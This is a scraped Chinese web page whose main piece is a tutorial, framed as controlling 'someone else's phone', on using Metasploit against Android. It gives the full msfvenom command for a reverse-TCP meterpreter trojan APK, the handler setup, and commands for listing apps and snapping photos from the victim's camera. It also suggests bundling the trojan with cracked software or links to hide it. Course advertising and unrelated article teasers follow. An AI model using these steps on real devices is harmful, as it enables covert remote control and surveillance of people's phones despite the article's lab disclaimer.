news 2026/1/29 9:42:16

如何利用MSF远程渗透操控别人手机?一文详解。

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
如何利用MSF远程渗透操控别人手机?一文详解。

黑客技术之MSF远程渗透操控别人手机

一、前言

MSF,全称为Metasploit Framework,是kali中一款全球知名的开源渗透测试工具。此文章中的方法只能进行内网渗透。由于kali在虚拟机中,其显示的内网IP无法被外网的安卓手机S直接访问,所以不能直接将文章方法应用于外网。该实验为模拟环境,未经授权的渗透都是违法行为,我们都是守法的好公民。而且这种方法只能渗透安卓10以下的系统,入侵渗透更高级的系统需要更加专业的知识,再加上只能进行内网渗透,所以这种方法很难进行违法渗透!

二、演示环境

攻击主机:虚拟机 kali IP:192.168.147.129

靶机:联想模拟器 安卓9

三、渗透过程

(一)查询虚拟机中kali的IP

我先在终端中输入ifconfig查询了自己虚拟机中kali的ip地址,如下图,可知ip为192.168.147.129

(二)使用root权限

我先在终端输入su root,输入自己的密码,使用root权限,然后在此权限下进行以下操作。

(三)生成木马

这个木马是放在靶机上的,目的是与攻击主机进行连接,使攻击主机控制靶机,为了隐蔽,我们可以把木马与软件或网站链接捆绑在一起,神不知鬼不觉地使木马在靶机上运行起来,这也就是为什么尽量不要在第三方网站下载破解软件,不要随便点击不明网站的原因。这里我为了追求方便,就直接裸木马

输入msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.147.129 LPORT=6666 R >木马.apk(这里的 LHOST换成自己kali的ip,LPORT换成一个没被占用的端口,后面的木马安装包apk的名称自定义)生成的安装包apk会默认生成在桌面的主文件夹中,并把此木马放在靶机上(在靶机上安装后软件名默认为MainActivity),先不要运行,如下图:

(四)打开MSF

我继续在终端输入msfconsole打开SF`(这里打开之后显示的图案是随机的)

(五)配置攻击载荷

我接着在终端中输入以下命令进行配置(一条一条输入)

use exploit/multi/handler //选择模块

set payload android/meterpreter/reverse_tcp //选择攻击模块

set LHOST 192.168.147.129 //与你自己kali的IP保持一致

set LPORT 6666 //与你之前设置的端口保持一致

(六)运行

配置完之后我输入run运行,然后双击靶机上的木马,使它在靶机上运行,出现类似如下图,则代表渗透成功:

(七)控制靶机的指令

1、查看对方手机系统信息

命令:sysinfo

2、查看对方手机安装哪些app文件

命令:app_list

3、控制摄像头拍摄一张照片

注意:要先给虚拟机摄像头权限,安装上相机,有前置摄像头开关的电脑要打开它

命令:webcam_snap

学习资源

如果你是也准备转行学习网络安全(黑客)或者正在学习,这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你

知识库由360智榜样学习中心独家打造出品,旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力,熟练掌握基础攻防到深度对抗。

1、知识库价值

深度: 本知识库超越常规工具手册,深入剖析攻击技术的底层原理与高级防御策略,并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等,提供了独到的技术视角和实战验证过的对抗方案。

广度: 面向企业安全建设的核心场景(渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营),本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点,是应对复杂攻防挑战的实用指南。

实战性: 知识库内容源于真实攻防对抗和大型演练实践,通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。

2、 部分核心内容展示

360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。

360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。

内容组织紧密结合攻防场景,辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合,是你学习过程中好帮手。

1、网络安全意识

2、Linux操作系统

3、WEB架构基础与HTTP协议

4、Web渗透测试

5、渗透测试案例分享

6、渗透测试实战技巧

7、攻防对战实战

8、CTF之MISC实战讲解

3、适合学习的人群

一、基础适配人群

  1. 零基础转型者‌:适合计算机零基础但愿意系统学习的人群,资料覆盖从网络协议、操作系统到渗透测试的完整知识链‌;
  2. 开发/运维人员‌:具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能,实现职业方向拓展‌或者转行就业;
  3. 应届毕业生‌:计算机相关专业学生可通过资料构建完整的网络安全知识体系,缩短企业用人适应期‌;

二、能力提升适配

1、‌技术爱好者‌:适合对攻防技术有强烈兴趣,希望掌握漏洞挖掘、渗透测试等实战技能的学习者‌;

2、安全从业者‌:帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力‌;

3、‌合规需求者‌:包含等保规范、安全策略制定等内容,适合需要应对合规审计的企业人员‌;

因篇幅有限,仅展示部分资料,完整版的网络安全学习资料已经上传CSDN,朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/1/25 1:52:25

3大核心技术揭秘:Puerts如何让UE5程序化生成效率提升500%

3大核心技术揭秘:Puerts如何让UE5程序化生成效率提升500% 【免费下载链接】puerts PUER(普洱) Typescript. Lets write your game in UE or Unity with TypeScript. 项目地址: https://gitcode.com/GitHub_Trending/pu/puerts 在游戏开发领域,程序…

作者头像 李华
网站建设 2026/1/25 1:48:38

当测试遇上智能

在数字化转型浪潮与全球数据安全法规日趋严格的背景下,数据安全已从IT的辅助角色跃升为企业的核心生命线。对于软件测试从业者而言,传统的、基于固定规则和已知模式的数据安全测试方法正面临巨大挑战:未知的攻击向量、海量的代码与数据交互、…

作者头像 李华
网站建设 2026/1/25 3:22:10

Ice终极指南:免费快速打造完美macOS菜单栏管理方案

Ice终极指南:免费快速打造完美macOS菜单栏管理方案 【免费下载链接】Ice Powerful menu bar manager for macOS 项目地址: https://gitcode.com/GitHub_Trending/ice/Ice 作为一名Mac用户,你是否曾经被杂乱的菜单栏图标困扰?每天打开电…

作者头像 李华
网站建设 2026/1/25 4:21:09

Tabby终极指南:从零开始掌握开源AI编程助手

Tabby终极指南:从零开始掌握开源AI编程助手 【免费下载链接】tabby tabby - 一个自托管的 AI 编程助手,提供给开发者一个开源的、本地运行的 GitHub Copilot 替代方案。 项目地址: https://gitcode.com/GitHub_Trending/tab/tabby 还在为寻找免费…

作者头像 李华
网站建设 2026/1/27 11:46:29

SLM模拟教程:解锁增材制造的新视野

SLM模拟教程 增材制造 additive manufacturing 选区激光熔化 SLM 数值模拟 计算流体动力学CFD Flow3d11.2版本 keyhole-induced pore 匙孔孔隙 可模拟单层单道、多道多层 该模型能够模拟高能量密度下产生的匙孔孔隙,与有些不能模拟高能量密度的模型完全不同&#x…

作者头像 李华